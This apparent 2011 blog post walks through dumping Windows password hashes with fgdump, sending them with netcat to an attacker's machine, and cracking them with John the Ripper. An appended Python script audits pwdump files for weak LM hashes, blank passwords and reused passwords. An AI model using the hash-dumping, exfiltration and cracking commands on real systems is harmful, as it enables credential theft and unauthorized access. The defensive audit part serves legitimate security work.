Friday, March 11, 2011

Basics of Windows password recovery

In this post I outline the basic steps for a successful Windows password recovery.
Tools used: fgdump, John the Ripper

On target machine as Administrator:

C:\> fgdump.exe -c        # dumps the local password hashes to the file 127.0.0.1.pwdump in the current directory

We use netcat to send the dumped hashes to the attacker's machine. On the attacker's machine, start a listener:

$ nc -l -p 2222 > 127.0.0.1.pwdump     # keep the same file name the john commands below refer to

Then, on the target machine, send the file:

C:\> nc <attackers_ip> 2222 < 127.0.0.1.pwdump

On attacker's machine:

$ ./john --session=recovery1 127.0.0.1.pwdump

We can stop the cracking session with ^C and resume it later with:

$ ./john --restore=recovery1

Pressing a key (e.g. the spacebar) while john runs shows the current cracking speed and progress. Recovered passwords are stored in the john.pot file; to write them to a separate file:

$ ./john --show 127.0.0.1.pwdump > 127.0.0.1.cracked.txt

This is the basic scenario for recovering passwords. There is much more to john (modes of operation, distributing the computation across several machines, optimizing the key space). More on that in a future post.
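A defender who ends up with the same pwdump-format file (for example from an authorized audit) usually wants to know what is wrong with the stored hashes before spending any time cracking them. The following added example is not from the original post or from the fgdump/john projects: it parses the `user:RID:LMhash:NThash:::` line format that fgdump writes and flags three conditions worth remediating, accounts that still have an LM hash stored (LM hashing is weak; the NoLMHash policy prevents it), accounts with a blank password (the NT hash of the empty string), and groups of accounts sharing one NT hash (the same password reused). The sample dump and its hash values are constructed placeholders, not real hashes from any machine; the two well-known constants for an empty LM and empty NT hash are real.

```python
import re
from collections import defaultdict

# Well-known values: the LM hash stored when no LM hash exists, and the NT hash of "".
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# pwdump line layout: user:RID:LMhash:NThash:::
PWDUMP_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")

# Constructed sample dump (hash values are placeholders, not real credentials).
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
legacy:1001:fedcba9876543210fedcba9876543210:0123456789abcdef0123456789abcdef:::
svc_backup:1002:aad3b435b51404eeaad3b435b51404ee:89abcdef0123456789abcdef01234567:::
this line is not in pwdump format and is skipped
"""


def parse_pwdump(text):
    """Return a list of (user, rid, lm, nt) tuples; malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        m = PWDUMP_RE.match(line.strip())
        if not m:
            continue
        user, rid, lm, nt = m.groups()
        records.append((user, int(rid), lm.lower(), nt.lower()))
    return records


def audit(records):
    """Flag weak storage conditions in parsed pwdump records."""
    findings = {"lm_hash_stored": [], "blank_password": [], "shared_password": []}
    by_nt = defaultdict(list)  # NT hash -> users carrying it
    for user, _rid, lm, nt in records:
        if lm != EMPTY_LM:
            # An LM hash is present: the password is stored in the weak LM form too.
            findings["lm_hash_stored"].append(user)
        if nt == EMPTY_NT:
            # NT hash of the empty string: the account has a blank password.
            findings["blank_password"].append(user)
        else:
            by_nt[nt].append(user)
    for users in by_nt.values():
        if len(users) > 1:
            # Identical NT hashes mean identical passwords across these accounts.
            findings["shared_password"].append(users)
    return findings


if __name__ == "__main__":
    for category, users in audit(parse_pwdump(SAMPLE_DUMP)).items():
        print(f"{category}: {users}")
```

Run against a real dump, the output tells you which accounts to reset first and whether the NoLMHash policy is actually in effect, independent of whether any hash is ever cracked.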